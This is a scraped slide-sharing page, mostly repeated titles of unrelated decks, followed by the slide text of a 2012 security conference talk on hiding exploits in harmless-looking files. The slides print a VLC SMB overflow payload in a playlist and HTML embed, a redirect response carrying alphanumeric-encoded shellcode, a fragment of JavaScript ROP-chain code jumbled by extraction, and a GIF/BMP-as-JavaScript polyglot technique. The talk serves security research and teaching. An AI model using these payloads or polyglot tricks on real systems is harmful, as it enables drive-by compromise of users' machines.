CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 

Recently uploaded (20)

What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 

When Bad Things Come In Good Packages

  • 1. when Bad Things come in Good packages Saumil Shah net-square DEEPSEC 2012
  • 2. # who am i Saumil Shah, CEO Net-Square. •  Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. •  M.S. Computer Science Purdue University. •  saumil@net-square.com •  LinkedIn: saumilshah •  Twitter: @therealsaumil net-square
  • 3. My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference Conference "Eyes and Speaker Trainer ears open" net-square
  • 4. When two forces combine... Web Binary Hacking Exploits net-square
  • 5. SNEAKY LETHAL net-square
  • 7. 302 IMG JS HTML5 net-square
  • 9. VLC smb overflow •  smb://example.com@0.0.0.0/foo/ #{AAAAAAAA....} •  Classic Stack Overflow. net-square
  • 10. VLC XSPF file <?xml version="1.0" encoding="UTF-8"?>! <playlist version="1"! xmlns="http://xspf.org/ns/0/"! xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">! <title>Playlist</title>! <trackList>! <track>! <location>! smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}! </location>! <extension! application="http://www.videolan.org/vlc/playlist/0">! <vlc:id>0</vlc:id>! </extension>! </track>! </trackList>! </playlist>! net-square
  • 11. Alpha Encoded Tiny ZOMFG! Exploit URL net-square
  • 12. 100% Pure Alphanum! net-square
  • 13. VLC smb overflow - HTMLized!! "<embed type="application/x-vlc-plugin"! " "width="320" height="200"! " "target="http://tinyurl.com/ycctrzf"! " "id="vlc" />! net-square
  • 14. 301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently! X-Powered-By: PHP/5.2.12! Location: smb://example.com@0.0.0.0/foo/ #{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1! JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII! IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL! KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk! PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH! kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn! CUCHPeEPAA}! Content-type: text/html! Content-Length: 0! Connection: close! Server: TinyURL/1.6! net-square
  • 16. Exploits as Images - 1 •  Grayscale encoding (0-255). •  1 pixel = 1 character. •  Perfectly valid image. •  Decode and Execute! net-square
  • 18. I'm an evil Javascript I'm an innocent image net-square
  • 19. function packv(n) {var s=new Number(n).toStri ng(16);while(s.l return(unescape( ength<8)s="0"+s; "%u"+s.substring string(0,4)))}va (4,8)+"%u"+s.sub r addressof=new Array();addresso f["ropnop"]=0x6d ["xchg_eax_esp_r 81bdf0;addressof et"]=0x6d81bdef; ax_ret"]=0x6d906 addressof["pop_e 744;addressof["p d81cd57;addresso op_ecx_ret"]=0x6 f["mov_peax_ecx_ ;addressof["mov_ ret"]=0x6d979720 eax_pecx_ret"]=0 sof["mov_pecx_ea x6d8d7be0;addres x_ret"]=0x6d8eee c_eax_ret"]=0x6d 01;addressof["in 838f54;addressof ]=0x00000000;add ["add_eax_4_ret" ressof["call_pea 31;addressof["ad x_ret"]=0x6d8aec d_esp_24_ret"]=0 sof["popad_ret"] x00000000;addres =0x6d82a8a1;addr "]=0x6d802597;fu essof["call_peax nction call_ntallocatev irtualmemory(bas m){var ropnop=pac eptr,size,callnu kv(addressof["ro pop_eax_ret=pack pnop"]);var v(addressof["pop pop_ecx_ret=pack _eax_ret"]);var v(addressof["pop mov_peax_ecx_ret _ecx_ret"]);var =packv(addressof et"]);var ["mov_peax_ecx_r mov_eax_pecx_ret =packv(addressof et"]);var ["mov_eax_pecx_r mov_pecx_eax_ret =packv(addressof et"]);var ["mov_pecx_eax_r call_peax_ret=pa ckv(addressof["c var all_peax_ret"]); add_esp_24_ret=p ackv(addressof[" );var add_esp_24_ret"] popad_ret=packv( addressof["popad retval=""! _ret"]);var <CANVAS> net-square
  • 20. net-square See no eval()
  • 21. Same Same No Different! var a = eval(str); a = (new Function(str))(); net-square
  • 22. IMAJS net-square I iz being a Javascript
  • 23. IMAJS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script> net-square
  • 24. IMAJS-GIF Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
  • 25. IMAJS-BMP Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
  • 27. Demo IMAJS αq FTW! net-square
  • 28. Alpha encoded exploit code IMAJS CANVAS "loader" script net-square
  • 29. These are not the sploits you're looking for net-square
  • 30. No virus threat detected net-square
  • 32. when Bad Things come in Good packages THE END @therealsaumil saumil@net-square.com net-square